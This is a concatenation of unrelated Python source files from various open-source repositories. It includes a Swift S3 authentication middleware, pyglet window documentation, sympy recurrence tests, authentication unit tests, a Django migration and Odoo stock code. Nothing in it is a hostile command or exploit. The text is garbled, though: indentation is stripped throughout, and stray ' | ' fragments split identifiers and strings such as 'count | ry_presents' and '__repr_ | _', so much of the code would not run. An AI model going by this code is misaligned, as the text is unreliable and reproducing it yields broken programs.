args = parser.parse_args()
if args.graph == 'regular':
runner = compare_cases.run_regular
elif args.graph == 'scalefree':
runner = compare_cases.run_scalefree
else:
runner = compare_cases.run_on_graph
G = nx.read_graphml(args.graph)
G = G.to_undirected() # Force undirected
if runner == compare_cases.run_on_graph:
result = runner(G=G, iterations=args.iterations,
epsilon_control=args.epsilon_control,
epsilon_damage=args.epsilon_damage)
else:
result = runner(nodes=args.nodes, iterations=args.iterations,
epsilon_control=args.epsilon_control,
epsilon_damage=args.epsilon_damage)
(uncontrolled, controlled, df, costs) = result
df.to_csv('results/cascades_{:0>4d}.csv'.format(args.run_id))
with open('results/costs_{:0>4d}.csv'.format(args.run_id), 'w') as f:
f.write(str(costs[0]) + '\n')
f.write(str(costs[1]) + '\n')
if __name__ == '__main__':
main()
|
django-blog-zinnia/zinnia-twitter | setup.py | Python | bsd-3-clause | 1,097 | 0 | """Setup script of zinnia-twitter"""
from setuptools import setup
from setuptools import find_packages
import zinnia_twitter
setup(
name='zinnia-twitter',
version=zinnia_twitter.__version__,
description='Twitter plugin for django-blog-zinnia',
long_description=open('README.rst').read(),
keywords='django, | zinnia, twitter',
author=zinnia_twitter.__author__,
author_email=zinnia_twitter.__email__,
ur | l=zinnia_twitter.__url__,
packages=find_packages(exclude=['demo_zinnia_twitter']),
classifiers=[
'Framework :: Django',
'Development Status :: 5 - Production/Stable',
'Environment :: Web Environment',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Intended Audience :: Developers',
'Operating System :: OS Independent',
'License :: OSI Approved :: BSD License',
'Topic :: Software Development :: Libraries :: Python Modules'],
license=zinnia_twitter.__license__,
include_package_data=True,
zip_safe=False,
install_requires=['tweepy']
)
|
cbartz/swift-s3auth | s3auth/middleware.py | Python | apache-2.0 | 16,590 | 0.000121 | # Copyright 2017 Christopher Bartz <bartz@dkrz.de>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from functools import partial
from hashlib import sha1
import hmac
import json
from traceback import format_exc
from urllib import quote
from swift.common.swob import HTTPBadRequest, HTTPCreated, HTTPForbidden,\
HTTPInternalServerError, HTTPNoContent, HTTPNotFound, HTTPOk,\
HTTPUnauthorized, wsgify
from swift.common.utils import cache_from_env, get_logger, split_path
from swift.common.wsgi import make_pre_authed_request
MEMCACHE_KEY_FORMAT = '%s/s3auth/%s'
HKEY_HASH_KEY = 'X-Account-Meta-Hash-Key'
HKEY_HASHED_ADMIN_KEY = 'X-Account-Meta-Hashed-Admin-Key'
def _hash_msg(msg, hash_key):
"""Return sha1 hash for given message."""
return hmac.new(hash_key, msg, sha1).hexdigest()
def _denied_response(req):
"""Return a 403 or 401 Response depending on REMOTE_USER."""
if req.remote_user:
return HTTPForbidden(request=req)
else:
return HTTPUnauthorized(request=req)
def _require_s3auth_admin(f):
""" Decorator which checks if user is s3auth admin."""
def inner(*args, **kwargs):
self = args[0]
req = args[1]
key1 = req.headers.get('x-s3auth-admin-key')
if not key1:
return HTTPBadRequest(
body='x-s3auth-admin-key header required',
request=req)
path = quote('/v1/{}'.format(self.auth_account))
resp = make_pre_authed_request(
req.environ, 'HEAD', path).get_response(self.app)
if resp.status_int // 100 != 2:
raise Exception('Could not HEAD account: {} {}'.format(
path, resp.status_int))
hashed_key2 = resp.headers.get(HKEY_HASHED_ADMIN_KEY)
hash_key = resp.headers[HKEY_HASH_KEY].encode('utf-8')
if _hash_msg(key1, hash_key) == hashed_key2:
return f(*args, **kwargs)
else:
return _denied_response(req)
inner.__doc__ = f.__doc__
inner.__repr__ = f.__repr_ | _
return inner
class S3Auth(object):
def __init__(self, app, conf):
self.app = app
self.logger = get_logger(conf, log_route='s3auth')
self.auth_prefix = conf.get('auth_prefix', '/s3auth/')
if not self.auth_prefix:
self.auth_prefix = '/s3auth/'
if self.auth_prefix[0] != '/':
self.auth_prefix = '/' + self.auth_prefix
| if self.auth_prefix[-1] != '/':
self.auth_prefix += '/'
self.reseller_prefix = (conf.get('reseller_prefix', 'AUTH_').
rstrip('_') + '_')
self.auth_account = "{}.s3auth".format(self.reseller_prefix)
self.akd_container_url = '/v1/{}/akeydetails/'.format(
self.auth_account
)
self.prep_key = conf.get('prep_key')
cache_time = conf.get('memcache_time', 60 * 10)
try:
self.cache_time = float(cache_time)
except ValueError:
raise ValueError(
'value %s for memcache_time option must be a float',
cache_time)
def _authorize(self, req):
"""
Authorize swift request. Used e.g. by proxy-server.
:return: None if authorized, otherwise Response
"""
try:
version, account, container, obj = split_path(
req.path, 1, 4, True)
except ValueError:
return _denied_response(req)
if not account or not account.startswith(self.reseller_prefix):
return _denied_response(req)
if req.remote_user == account and \
(req.method not in ('DELETE', 'PUT') or container):
# If the user is admin for the account and is not trying to do an
# account DELETE or PUT...
req.environ['swift_owner'] = True
return None
return _denied_response(req)
@wsgify
def __call__(self, req):
"""Accept a standard WSGI app call.
The call takes one of two paths:
- Handle a request to the auth system (e.g. creating
new access keys or changing a secret key).
- Authenticate a request which is signed with a s3 signature.
"""
try:
if req.path_info.startswith(self.auth_prefix):
return self.handle_auth_api(req)
if 'swift3.auth_details' in req.environ:
auth_details = req.environ['swift3.auth_details']
akey = auth_details['access_key']
secret, account = self._get_details(req, akey)
if secret:
# Authentication.
if auth_details['check_signature'](secret.encode('utf-8')):
req.environ['swift.authorize_override'] = True
# Authorization function (used later in pipeline).
req.environ['swift.authorize'] = self._authorize
req.remote_user = account
# swift3 sets account to access_key . Replace.
req.environ['PATH_INFO'] = req.environ['PATH_INFO'].\
replace(akey, account, 1)
else:
return _denied_response(req)
else:
return _denied_response(req)
except Exception:
self.logger.error(
'EXCEPTION occured: %s: %s', format_exc(), req.environ)
return HTTPInternalServerError(request=req)
return self.app
def _get_details(self, req, access_key):
"""Get access key details.
:return: (secret_key, account) as tuple or (None, None) if not found.
"""
memcache_client = cache_from_env(req.environ)
if memcache_client:
memcache_key = MEMCACHE_KEY_FORMAT % (
self.reseller_prefix, access_key)
data = memcache_client.get(memcache_key)
if data:
return data[0], data[1]
path = quote(self.akd_container_url + access_key)
resp = make_pre_authed_request(req.environ, 'GET',
path).get_response(self.app)
if resp.status_int // 100 == 2:
data = json.loads(resp.body)
secret_key, account = data['secret_key'], data['account']
if memcache_client:
memcache_client.set(memcache_key, (secret_key, account),
time=self.cache_time)
return secret_key, account
elif resp.status_int // 100 == 4:
return None, None
else:
raise Exception('Could not GET access key details: {} {}'.format(
path, resp.status_int))
def _set_details(self, req, access_key, secret_key, account):
"""Set access key details."""
path = quote(self.akd_container_url + access_key)
resp = make_pre_authed_request(
env=req.environ,
method='PUT',
path=path,
body=json.dumps({'secret_key': secret_key, 'account': account})).\
get_response(self.app)
if resp.status_int // 100 == 2:
# Remove old data from cache.
memcache_client = cache_from_env(req.environ)
if memcache_client:
memcache_key = MEMCACHE_KEY_FORMAT % (self.reseller_prefix,
access_key)
memcache_client.delete(memcache_key)
else:
raise Exception(
'Could not PUT access key details: {} {}'.format(
path, resp.status_int |
certik/sympy-oldcore | sympy/plotting/pyglet/window/__init__.py | Python | bsd-3-clause | 54,133 | 0.00133 | # ----------------------------------------------------------------------------
# pyglet
# Copyright (c) 2006-2007 Alex Holkner
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of the pyglet nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
'''Windowing and user-interface events.
This module allows applications to create and display windows with an
OpenGL context. Windows can be created with a variety of border styles
or set fullscreen.
You can register event handlers for keyboard, mouse and window events.
For games and kiosks you can also restrict the input to your windows,
for example disabling users from switching away from the application
with certain key combinations or capturing and hiding the mouse.
Getting started
---------------
Call the Window constructor to create a new window::
from pyglet.window import Window
win = Window(width=640, height=480)
Attach your own event handlers::
@win.event
def on_key_press(symbol, modifiers):
# ... handle this even | t ...
Within your main run loop, you must call `Window.dispatch_events` regularly.
Windows are double-buffered by default, so you must call `Window.flip` to
update the display::
while not win.has_exit:
win.dispatch_events()
# ... drawing commands ... |
win.flip()
Creating a game window
----------------------
Use `Window.set_exclusive_mouse` to hide the mouse cursor and receive relative
mouse movement events. Specify ``fullscreen=True`` as a keyword argument to
the `Window` constructor to render to the entire screen rather than opening a
window::
win = Window(fullscreen=True)
win.set_mouse_exclusive()
Working with multiple windows
-----------------------------
You can open any number of windows and render to them individually. Each
window must have the event handlers set on it that you are interested in
(i.e., each window will have its own mouse event handler).
You must call `Window.dispatch_events` for each window. Before rendering
to a window, you must call `Window.switch_to` to set the active GL context.
Here is an example run loop for a list of windows::
windows = # list of Window instances
while windows:
for win in windows:
win.dispatch_events()
if win.has_exit:
win.close()
windows = [w for w in windows if not w.has_exit]
for win in windows:
win.switch_to()
# ... drawing commands for this window ...
win.flip()
Working with multiple screens
-----------------------------
By default, fullscreen windows are opened on the primary display (typically
set by the user in their operating system settings). You can retrieve a list
of attached screens and select one manually if you prefer. This is useful for
opening a fullscreen window on each screen::
display = window.get_platform().get_default_display()
screens = display.get_screens()
windows = []
for screen in screens:
windows.append(window.Window(fullscreen=True, screen=screen))
Specifying a screen has no effect if the window is not fullscreen.
Specifying the OpenGL context properties
----------------------------------------
Each window has its own context which is created when the window is created.
You can specify the properties of the context before it is created
by creating a "template" configuration::
from pyglet import gl
# Create template config
config = gl.Config()
config.stencil_size = 8
config.aux_buffers = 4
# Create a window using this config
win = window.Window(config=config)
To determine if a given configuration is supported, query the screen (see
above, "Working with multiple screens")::
configs = screen.get_matching_configs(config)
if not configs:
# ... config is not supported
else:
win = window.Window(config=configs[0])
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id: __init__.py 1195 2007-08-24 09:38:40Z Alex.Holkner $'
import pprint
import sys
from pyglet import gl
from pyglet.gl import gl_info
from pyglet.event import EventDispatcher
from pyglet.window.event import WindowExitHandler
import pyglet.window.key
class WindowException(Exception):
'''The root exception for all window-related errors.'''
pass
class NoSuchDisplayException(WindowException):
'''An exception indicating the requested display is not available.'''
pass
class NoSuchConfigException(WindowException):
'''An exception indicating the requested configuration is not
available.'''
pass
class MouseCursorException(WindowException):
'''The root exception for all mouse cursor-related errors.'''
pass
class Platform(object):
'''Operating-system-level functionality.
The platform instance can only be obtained with `get_platform`. Use
the platform to obtain a `Display` instance.
'''
def get_display(self, name):
'''Get a display device by name.
This is meaningful only under X11, where the `name` is a
string including the host name and display number; for example
``"localhost:1"``.
On platforms other than X11, `name` is ignored and the default
display is returned. pyglet does not support multiple multiple
video devices on Windows or OS X. If more than one device is
attached, they will appear as a single virtual device comprising
all the attached screens.
:Parameters:
`name` : str
The name of the display to connect to.
:rtype: `Display`
'''
return get_default_display()
def get_default_display(self):
'''Get the default display device.
:rtype: `Display`
'''
raise NotImplementedError('abstract')
class Display(object):
'''A display device supporting one or more screens.
Use `Platform.get_display` or `Platform.get_default_display` to obtain
an instance of this class. Use a display to obtain `Screen` instances.
'''
def __init__(self):
self._windows = []
def get_screens(self):
'''Get the available screens.
A typical multi-monitor workstation comprises one `Display` with
multiple `Screen` s. This method returns a list of screens which
can be enumerated to select one for full-screen display.
For the purposes of creating an OpenGL config, the default screen
will suffice.
:rtype: list of `Screen`
'''
raise NotImplementedError('abstract')
def get_default_screen(self):
'''Get the default screen as specified by the user's operating system
preferences.
|
ValyrianTech/BitcoinSpellbook-v0.3 | unittests/test_authentication.py | Python | gpl-3.0 | 3,052 | 0.00557 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import pytest
import mock
import authentication
NONCE = 1
class TestAuthentication(object):
headers = None
data = None
def setup(self):
global NONCE
authentication.load_from_json_file = mock.MagicMock(return_value={'foo': {'secret': 'bar1'}})
self.data = {'test': 'test'}
NONCE = NONCE + 1
self.headers = {'API_Key': 'foo',
'AP | I_Sign': authentication.signature(self.data, NONCE, 'bar1'),
'API_Nonce': NONCE}
def test_check_authentication_with_valid | _headers_and_data(self):
assert authentication.check_authentication(self.headers, self.data) == authentication.AuthenticationStatus.OK
def test_check_authentication_with_valid_headers_and_data_but_the_same_nonce(self):
self.headers['API_Sign'] = authentication.signature(self.data, NONCE-1, 'bar1')
self.headers['API_Nonce'] = NONCE - 1
assert authentication.check_authentication(self.headers, self.data) == authentication.AuthenticationStatus.INVALID_NONCE
def test_check_authentication_with_valid_headers_and_data_and_a_nonce_that_is_higher_than_the_previous_request(self):
assert authentication.check_authentication(self.headers, self.data) == authentication.AuthenticationStatus.OK
def test_check_authentication_without_api_key_header(self):
del self.headers['API_Key']
assert authentication.check_authentication(self.headers, self.data) == authentication.AuthenticationStatus.NO_API_KEY
def test_check_authentication_without_api_sign_header(self):
del self.headers['API_Sign']
assert authentication.check_authentication(self.headers, self.data) == authentication.AuthenticationStatus.NO_SIGNATURE
def test_check_authentication_without_api_nonce_header(self):
del self.headers['API_Nonce']
assert authentication.check_authentication(self.headers, self.data) == authentication.AuthenticationStatus.NO_NONCE
def test_check_authentication_with_wrong_secret(self):
self.headers['API_Sign'] = authentication.signature(self.data, NONCE, 'ABCD')
assert authentication.check_authentication(self.headers, self.data) == authentication.AuthenticationStatus.INVALID_SIGNATURE
def test_check_authentication_with_api_key(self):
self.headers['API_Key'] = 'bar'
assert authentication.check_authentication(self.headers, self.data) == authentication.AuthenticationStatus.INVALID_API_KEY
def test_check_authentication_with_changed_data(self):
self.data = {'something': 'else'}
assert authentication.check_authentication(self.headers, self.data) == authentication.AuthenticationStatus.INVALID_SIGNATURE
def test_signature_with_secret_that_is_not_a_multiple_of_4_characters(self):
with pytest.raises(Exception) as ex:
authentication.signature(self.data, NONCE, 'a')
assert 'The secret must be a string with a length of a multiple of 4!' in str(ex.value)
|
unicef/un-partner-portal | backend/unpp_api/apps/partner/migrations/0005_partner_country_presents.py | Python | apache-2.0 | 733 | 0.001364 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-08-28 07:07
from __future__ import unicode_literals
import django.contrib.postgres.fields
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('partner', '0004_auto_20170814_0841'),
]
operations = [
migrations.AddField(
mod | el_name='partner',
name='count | ry_presents',
field=django.contrib.postgres.fields.ArrayField(base_field=models.CharField(choices=[('Ara', 'Arabic'), ('Chi', 'Chinese'), ('Eng', 'English'), ('Fre', 'French'), ('Rus', 'Russian'), ('Spa', 'Spanish'), ('Oth', 'Other')], max_length=2), default=list, null=True, size=None),
),
]
|
DmitrySPetrov/simulation_g11 | l06/12.py | Python | mit | 1,229 | 0.007833 | # Задача №1:
# Сформировать массив из N эле | ментов вида [1,2,3,4,...N]
#
# Вариант решения №2, через превращение range() в массив
#
# =!!= Запускать с помощью Python3 =!!=
# Указываем количество
N = | 10
# Создаем массив
A = [ *range(1,N+1) ]
# Выводим A
print( A )
# Пояснения:
# 1) range(1,N+1) создает последовательность 1,2,3...N
# 2) с точки зрения языка программирования, range(...) создает объект,
# который будет превращаться в последовательность не сразу, а тогда,
# когда его вызовут, в связи с чем перед range(...) стоит символ *
# 3) оператор * означает команду "преврати объект в последовательность"
# например, *[1,2,3] превратит просто в последовательность 1,2,3
# range(1,N+1) также разворачивается в последовательность по этой команде
|
GbalsaC/bitnamiP | venv/lib/python2.7/site-packages/sympy/solvers/tests/test_recurr.py | Python | agpl-3.0 | 3,721 | 0.013169 | from sympy import Function, symbols, S, sqrt, rf, factorial
from sympy.solvers.recurr import rsolve, rsolve_poly, rsolve_ratio, rsolve_hyper
y = Function('y')
n, k = symbols('n,k', integer=True)
C0, C1, C2 = symbols('C0,C1,C2')
def test_rsolve_poly():
assert rsolve_poly([-1, -1, 1], 0, n) == 0
assert rsolve_poly([-1, -1, 1], 1, n) == -1
assert rsolve_poly([-1, n+1], n, n) == 1
assert rsolve_poly([-1, 1], n, n) == C0 + (n**2 - n)/2
assert rsolve_poly([-n-1, n], 1, n) == C1*n - 1
assert rsolve_poly([-4*n-2, 1], 4*n+1, n) == -1
assert rsolve_poly([-1, 1], n**5 + n**3, n) == C0 - n**3 / 2 - n**5 / 2 + n**2 / 6 + n**6 / 6 + 2*n**4 / 3
def test_rsolve_ratio():
solution = rsolve_ratio([-2*n**3+n**2+2*n-1, 2*n**3+n**2-6*n,
-2*n**3-11*n**2-18*n-9, 2*n**3+13*n**2+22*n+8], 0, n)
assert solution in [
C1*((-2*n + 3)/(n**2 - 1))/3,
(S(1)/2)*(C1*(-3 + 2*n)/(-1 + n**2)),
(S(1)/2)*(C1*( 3 - 2*n)/( 1 - n**2)),
(S(1)/2)*(C2*( | -3 + 2*n)/(-1 + n**2)),
(S(1)/2)*(C2*( 3 - 2*n)/( 1 - n**2)),
]
def test_rsolve_hyper():
assert rsolve_hyper([-1, -1, 1], 0, n) in [
C0*(S.Half - S.Half*sqrt(5))**n + C1*(S.Half + S.Half*sqrt(5))**n,
C1*(S.Half - S.Half*sqrt(5))**n + C0*(S.Half + S.Half*sqrt(5))**n,
]
assert rsolve_hyper([n**2-2, -2*n-1, 1], 0, n) | in [
C0*rf(sqrt(2), n) + C1*rf(-sqrt(2), n),
C1*rf(sqrt(2), n) + C0*rf(-sqrt(2), n),
]
assert rsolve_hyper([n**2-k, -2*n-1, 1], 0, n) in [
C0*rf(sqrt(k), n) + C1*rf(-sqrt(k), n),
C1*rf(sqrt(k), n) + C0*rf(-sqrt(k), n),
]
assert rsolve_hyper([2*n*(n+1), -n**2-3*n+2, n-1], 0, n) == C0*factorial(n) + C1*2**n
assert rsolve_hyper([n + 2, -(2*n + 3)*(17*n**2 + 51*n + 39), n + 1], 0, n) == 0
assert rsolve_hyper([-n-1, -1, 1], 0, n) == 0
assert rsolve_hyper([-1, 1], n, n).expand() == C0 + n**2/2 - n/2
assert rsolve_hyper([-1, 1], 1+n, n).expand() == C0 + n**2/2 + n/2
assert rsolve_hyper([-1, 1], 3*(n+n**2), n).expand() == C0 + n**3 - n
def recurrence_term(c, f):
"""Compute RHS of recurrence in f(n) with coefficients in c."""
return sum(c[i]*f.subs(n, n+i) for i in range(len(c)))
def rsolve_bulk_checker(solver, c, q, p):
"""Used by test_rsolve_bulk."""
pp = solver(c, q, n)
assert pp == p
def test_rsolve_bulk():
"""Some bulk-generated tests."""
funcs = [ n, n+1, n**2, n**3, n**4, n+n**2, 27*n + 52*n**2 - 3*n**3 + 12*n**4 - 52*n**5 ]
coeffs = [ [-2, 1], [-2, -1, 1], [-1, 1, 1, -1, 1], [-n, 1], [n**2-n+12, 1] ]
for p in funcs:
# compute difference
for c in coeffs:
q = recurrence_term(c, p)
if p.is_polynomial(n):
yield rsolve_bulk_checker, rsolve_poly, c, q, p
#if p.is_hypergeometric(n):
# yield rsolve_bulk_checker, rsolve_hyper, c, q, p
def test_rsolve():
f = y(n+2) - y(n+1) - y(n)
h = sqrt(5)*(S.Half + S.Half*sqrt(5))**n \
- sqrt(5)*(S.Half - S.Half*sqrt(5))**n
assert rsolve(f, y(n)) in [
C0*(S.Half - S.Half*sqrt(5))**n + C1*(S.Half + S.Half*sqrt(5))**n,
C1*(S.Half - S.Half*sqrt(5))**n + C0*(S.Half + S.Half*sqrt(5))**n,
]
assert rsolve(f, y(n), [ 0, 5 ]) == h
assert rsolve(f, y(n), { 0 :0, 1 :5 }) == h
assert rsolve(f, y(n), { y(0):0, y(1):5 }) == h
f = (n-1)*y(n+2) - (n**2+3*n-2)*y(n+1) + 2*n*(n+1)*y(n)
g = C0*factorial(n) + C1*2**n
h = -3*factorial(n) + 3*2**n
assert rsolve(f, y(n)) == g
assert rsolve(f, y(n), [ 0, 3 ]) == h
assert rsolve(f, y(n), { 0 :0, 1 :3 }) == h
assert rsolve(f, y(n), { y(0):0, y(1):3 }) == h
|
TheTimmy/spack | lib/spack/external/py/_path/local.py | Python | lgpl-2.1 | 32,583 | 0.001442 | """
local path implementation.
"""
from __future__ import with_statement
from contextlib import contextmanager
import sys, os, re, atexit, io
import py
from py._path import common
from py._path.common import iswin32, fspath
from stat import S_ISLNK, S_ISDIR, S_ISREG
from os.path import abspath, normpath, isabs, exists, isdir, isfile, islink, dirname
if sys.version_info > (3,0):
def map_as_list(func, iter):
return list(map(func, iter))
else:
map_as_list = map
class Stat(object):
def __getattr__(self, name):
return getattr(self._osstatresult, "st_" + name)
def __init__(self, path, osstatresult):
self.path = path
self._osstatresult = osstatresult
@property
def owner(self):
if iswin32:
raise NotImplementedError("XXX win32")
import pwd
entry = py.error.checked_call(pwd.getpwuid, self.uid)
return entry[0]
@property
def group(self):
""" return group name of file. """
if iswin32:
raise NotImplementedError("XXX win32")
import grp
entry = py.error.checked_call(grp.getgrgid, self.gid)
return entry[0]
def isdir(self):
return S_ISDIR(self._osstatresult.st_mode)
def isfile(self):
return S_ISREG(self._osstatresult.st_mode)
def islink(self):
st = self.path.lstat()
return S_ISLNK(self._osstatresult.st_mode)
class PosixPath(common.PathBase):
def chown(self, user, group, rec=0):
""" change ownership to the given user and group.
user and group may be specified by a number or
by a name. if rec is True change ownership
recursively.
"""
uid = getuserid(user)
gid = getgroupid(group)
if rec:
for x in self.visit(rec=lambda x: x.check(link=0)):
if x.check(link=0):
py.error.checked_call(os.chown, str(x), uid, gid)
py.error.checked_call(os.chown, str(self), uid, gid)
def readlink(self):
""" return value of a symbolic link. """
return py.error.checked_call(os.readlink, self.strpath)
def mklinkto(self, oldname):
""" posix style hard link to another name. """
py.error.checked_call(os.link, str(oldname), str(self))
def mksymlinkto(self, value, absolute=1):
""" create a symbolic link with the given value (pointing to another name). """
if absolute:
py.error.checked_call(os.symlink, str(value), self.strpath)
else:
base = self.common(value)
# with posix local paths '/' is always a common base
relsource = self.__class__(value).relto(base)
reldest = self.relto(base)
n = reldest.count(self.sep)
target = self.sep.join(('..', )*n + (relsource, ))
py.error.checked_call(os.symlink, target, self.strpath)
def getuserid(user):
import pwd
if not isinstance(user, int):
user = pwd.getpwnam(user)[2]
return user
def getgroupid(group):
import grp
if not isinstance(group, int):
group = grp.getgrnam(group)[2]
return group
FSBase = not iswin32 and PosixPath or common.PathBase
class LocalPath(FSBase):
""" object oriented interface to os.path and other local filesystem
related information.
"""
class ImportMismatchError(ImportError):
""" raised on pyimport() if there is a mismatch of __file__'s"""
sep = os.sep
class Checkers(common.Checkers):
def _stat(self):
try:
return self._statcache
except AttributeError:
try:
self._statcache = self.path.stat()
except py. | error.ELOOP:
self._statcache = self.path.lstat()
return self._statcache
def dir(self):
return S_ISDIR(self._stat().mode)
def file(self):
return S_ISREG(self._stat().mode)
def exists(self):
return self._stat()
def link(self):
st = self.path.lstat()
return S_ISLNK(st | .mode)
def __init__(self, path=None, expanduser=False):
""" Initialize and return a local Path instance.
Path can be relative to the current directory.
If path is None it defaults to the current working directory.
If expanduser is True, tilde-expansion is performed.
Note that Path instances always carry an absolute path.
Note also that passing in a local path object will simply return
the exact same path object. Use new() to get a new copy.
"""
if path is None:
self.strpath = py.error.checked_call(os.getcwd)
else:
try:
path = fspath(path)
except TypeError:
raise ValueError("can only pass None, Path instances "
"or non-empty strings to LocalPath")
if expanduser:
path = os.path.expanduser(path)
self.strpath = abspath(path)
def __hash__(self):
return hash(self.strpath)
def __eq__(self, other):
s1 = fspath(self)
try:
s2 = fspath(other)
except TypeError:
return False
if iswin32:
s1 = s1.lower()
try:
s2 = s2.lower()
except AttributeError:
return False
return s1 == s2
def __ne__(self, other):
return not (self == other)
def __lt__(self, other):
return fspath(self) < fspath(other)
def __gt__(self, other):
return fspath(self) > fspath(other)
def samefile(self, other):
""" return True if 'other' references the same file as 'self'.
"""
other = fspath(other)
if not isabs(other):
other = abspath(other)
if self == other:
return True
if iswin32:
return False # there is no samefile
return py.error.checked_call(
os.path.samefile, self.strpath, other)
def remove(self, rec=1, ignore_errors=False):
""" remove a file or directory (or a directory tree if rec=1).
if ignore_errors is True, errors while removing directories will
be ignored.
"""
if self.check(dir=1, link=0):
if rec:
# force remove of readonly files on windows
if iswin32:
self.chmod(448, rec=1) # octcal 0700
py.error.checked_call(py.std.shutil.rmtree, self.strpath,
ignore_errors=ignore_errors)
else:
py.error.checked_call(os.rmdir, self.strpath)
else:
if iswin32:
self.chmod(448) # octcal 0700
py.error.checked_call(os.remove, self.strpath)
def computehash(self, hashtype="md5", chunksize=524288):
""" return hexdigest of hashvalue for this file. """
try:
try:
import hashlib as mod
except ImportError:
if hashtype == "sha1":
hashtype = "sha"
mod = __import__(hashtype)
hash = getattr(mod, hashtype)()
except (AttributeError, ImportError):
raise ValueError("Don't know how to compute %r hash" %(hashtype,))
f = self.open('rb')
try:
while 1:
buf = f.read(chunksize)
if not buf:
return hash.hexdigest()
hash.update(buf)
finally:
f.close()
def new(self, **kw):
""" create a modified version of this path.
the following keyword arguments modify various path parts::
a:/some/path/to/a/file.ext
xx drive
xxxxxxxxxxxxxxxxx dirname
xxxxxxxx basename
xxxx purebasename
xxx ext
"""
obj = object.__new__(self.__class__)
|
ingadhoc/stock | stock_request_ux/models/stock_move.py | Python | agpl-3.0 | 1,308 | 0.000765 | ##############################################################################
# For copyright and license notices, see __manifest__.py file in module root
# directory
############################# | #################################################
from odoo import models, fields
class StockMove(models.Model):
_inherit = 'stock.move'
request_order_id = fields.Many2one(
related='stock_request_ids.order_id',
)
def _split(self, qty, restrict_partner_id=False):
""" When we are on a move created by a stock_request and we create a
backorder, we create a new allocation linked to this new move and
update | quantities
"""
new_move_id = super()._split(qty, restrict_partner_id=restrict_partner_id)
remaining_to_allocate = qty
for allocation in self.allocation_ids:
if not remaining_to_allocate:
break
to_allocate = min(
remaining_to_allocate, allocation.requested_product_uom_qty)
remaining_to_allocate -= to_allocate
allocation.copy({
'stock_move_id': new_move_id,
'requested_product_uom_qty': to_allocate,
})
allocation.requested_product_uom_qty -= to_allocate
return new_move_id
|
MontrealCorpusTools/PolyglotDB | polyglotdb/exceptions.py | Python | mit | 6,861 | 0.002186 |
# Base exception classes
class PGError(Exception):
"""
Base class for all exceptions explicitly raised in PolyglotDB.
"""
def __init__(self, value):
self.value = value
def __repr__(self):
return '{}: {}'.format(type(self).__name__, self.value)
def __str__(self):
return self.value
# Context Manager exceptions
class PGContextError(PGError):
"""
Exception class for when context managers should be used and aren't.
"""
pass
# Corpus loading exceptions
class ParseError(PGError):
"""
Exception class for parsing errors
"""
pass
class PGOSError(PGError):
"""
Exception class for when files or directories that are expected are missing.
Wrapper for OSError.
"""
pass
class CorpusIntegrityError(PGError):
"""
Exception for when a problem arises while loading in the corpus.
"""
pass
class DelimiterError(PGError):
"""
Exception for mismatch between specified delimiter and the actual text
when loading in CSV files and transcriptions.
"""
pass
class ILGError(ParseError):
"""
Exception for general issues when loading interlinear gloss files.
"""
pass
class ILGWordMismatchError(ParseError):
"""
Exception for when interlinear gloss files have different numbers of
words across lines that should have a one-to-one mapping.
Parameters
----------
spelling_line : list
List of words in the spelling line
transcription_line : list
List of words in the transcription line
"""
def __init__(self, mismatching_lines):
self.main = "There doesn't appear to be equal numbers of words in one or more of the glosses."
self.information = ''
self.details = 'The following glosses did not have matching numbers of words:\n\n'
for ml in mismatching_lines:
line_inds, line = ml
self.details += 'From lines {} to {}:\n'.format(*line_inds)
for k, v in line.items():
self.details += '({}, {} words) '.format(k, len(v))
self.details += ' '.join(str(x) for x in v) + '\n'
class ILGLinesMismatchError(ParseError):
"""
Exception for when the number of lines in a interlinear gloss file
is not a multiple of the number of types of lines.
Parameters
----------
lines : list
List of the lines in the interlinear gloss file
"""
def __init__(self, lines):
self.main = "There doesn't appear to be equal numbers of orthography and transcription lines"
self.information = ''
self.details = 'The following is the contents of the file after initial preprocessing:\n\n'
for line in lines:
if isinstance(line, tuple):
self.details += '{}: {}\n'.format(*line)
else:
self.details += str(line) + '\n'
class TextGridError(ParseError):
"""
Exception class for parsing TextGrids
"""
pass
class TextGridTierError(TextGridError):
"""
Exception for when a specified tier was not found in a TextGrid.
Parameters
----------
tier_type : str
The type of tier looked for (such as spelling or transcription)
tier_name : str
The name of the tier specified
tiers : list
List of tiers in the TextGrid that were inspected
"""
def __init__(self, tier_type, tier_name, tiers):
self.main = 'The {} tier name was not found'.format(tier_type)
self.information = 'The tier name \'{}\' was not found in any tiers'.format(tier_name)
